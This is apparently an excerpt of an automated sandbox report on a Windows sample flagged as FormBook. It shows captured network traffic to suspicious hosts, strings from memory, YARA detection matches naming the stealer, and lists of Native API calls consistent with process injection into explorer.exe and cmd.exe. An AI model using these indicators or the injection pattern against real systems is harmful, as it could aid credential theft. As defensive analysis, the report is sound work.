  Host: www.unitvn.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: Joe Sandbox View | ASN Name: SUPERDATA-AS-VNSUPERDATA-VN
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASN (US)
Source: Joe Sandbox View | ASN Name: AMAZON-AES (US)
Source: unknown | DNS traffic detected: queries for: www.7852bigbucktrail.info
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
  Pragma: no-cache
  Content-Type: text/html
  Content-Length: 1237
  Date: Wed, 13 Jan 2021 20:49:10 GMT
  Server: LiteSpeed
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67
  Data Ascii (decoded from the hex dump above, which the report truncates):
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" >
    <title> 404 Not Found
    </title></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Not Found
    </h2>
    <p>The resource requested could not be found on this server!</p>
    </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rg (truncated)
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419D50 NtCreateFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419E00 NtReadFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419E80 NtClose
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419F30 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419E4C NtReadFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_00419F2E NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015399A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015398F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015395D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015397A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015396E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539950 NtQueueApcThread
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015399D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_0153B040 NtSuspendThread
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539820 NtEnumerateKey
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015398A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539B00 NtSetValueKey
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_0153A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539A10 NtQuerySection
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539560 NtWriteFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_0153AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015395F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539770 NtSetInformationFile
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_0153A770 NtOpenThread
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539760 NtOpenProcess
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_0153A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539650 NtQueryValueKey
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_01539610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: 2_2_015396D0 NtCreateKey
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002AB4C0 NtQueryInformationToken
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002C9AB4 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FDA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FDB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FDA770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FDA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9560 NtWriteFile
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FDAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_02FD9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D86E91 appears 84 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D86EA6 appears 36 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D86FC1 appears 40 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D89100 appears 64 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 014FB150 appears 35 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D870FC appears 370 times
          Source: C:\Users\user\Desktop\RRW9901200241.exe Code function: String function: 00D8BF63 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 02F9B150 appears 45 times
          Source: RRW9901200241.exe, 00000000.00000002.341417567.0000000000FF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemsvfw32.dll.muij% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000000.00000003.337793378.000000001B18F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
